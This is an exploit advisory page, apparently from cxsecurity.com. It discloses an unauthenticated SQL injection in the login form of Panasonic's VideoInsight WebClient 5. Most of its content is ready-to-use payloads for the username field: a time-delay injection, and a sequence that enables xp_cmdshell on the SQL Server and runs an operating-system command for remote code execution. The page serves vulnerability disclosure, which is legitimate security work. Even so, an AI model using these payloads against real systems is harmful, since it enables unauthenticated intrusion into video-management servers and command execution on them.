VideoInsight WebClient 5 SQL Injection

2018.06.20
Credit: vosec
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Title: VideoInsight WebClient 5 - SQL Injection # Date: 2018-05-06 # Author: vosec # Vendor Homepage: https://www.security.us.panasonic.com/ # Software Link: https://www.security.us.panasonic.com/video-management-software/web-client/ # Version: 5 # Tested on: Windows Server 2008 R2 # CVE: N/A # Description: # This exploit is based on CVE-2017-5151 targeting versions prior. # The txtUserName and possibly txtPassword field contain an unauthenticated SQL injection vulnerability # that can be used for remote code execution. # SQL Injection - PoC # From the web login page submit the following string as the username with anything in the password field. # The web server will hang for 5 seconds: UyYr');WAITFOR DELAY '00:00:05'-- # Remote Code Execution - PoC # From the web login page submit each of the following strings as the username, one at a time, with anything # in the password field (with the ping, use a valid IP address that you can monitor): UyYr');EXEC sp_configure 'show advanced options', 1;RECONFIGURE;-- UyYr');EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- UyYr');EXEC xp_cmdshell 'ping xxx.xxx.xxx.xxx';--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top